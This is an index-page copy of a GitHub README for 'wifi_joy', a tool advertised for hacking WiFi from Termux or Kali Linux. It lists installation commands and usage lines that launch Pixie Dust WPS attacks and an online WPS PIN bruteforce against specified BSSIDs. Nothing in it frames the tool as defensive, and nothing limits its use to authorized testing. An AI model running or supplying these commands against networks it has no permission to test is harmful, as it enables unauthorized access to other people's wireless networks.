An open API service indexing awesome lists of open source software.

https://github.com/joy43/wifi_joy

wifi_hacking tool
https://github.com/joy43/wifi_joy

kali-linux python wifi-network

Last synced: 3 months ago
JSON representation

wifi_hacking tool

Awesome Lists containing this project

README

        

## ssjoy
### Hack WIfi Using Termux! (Requires Root)

### Installation :

```bash
$ apt update && apt upgrade
$ apt install -y root-repo
$ apt install -y git tsu python wpa-supplicant pixiewps iw
$ git clone https://github.com/Joy43/wifi_joy.git
$ cd ssjoy
$ chmod +x joy.py
$ sudo python joy.py --help
```
* Run joy.py with python3
* On kali linux
```bash
python3 joy.py -i wlan0 -K
```

#### Example : `python3 joy.py -i wlan0 -K`

#### Note:
**First turn off your Wifi.**
- Show avaliable networks and start Pixie Dust attack on a specified network.
- `sudo python joy.py -i wlan0 -K`
- - Start Pixie Dust attack on a specified BSSID:
`sudo python joy.py -i wlan0 -b 00:91:4C:C3:AC:28 -K`
- Launch online WPS bruteforce with the specified first half of the PIN:
- `sudo python joy.py -i wlan0 -b 00:90:4C:C1:AC:21 -B -p 1234`
### Troubleshooting
**"Device or resource busy (-16)" - Turn on Wifi and Then Turn off Wifi.**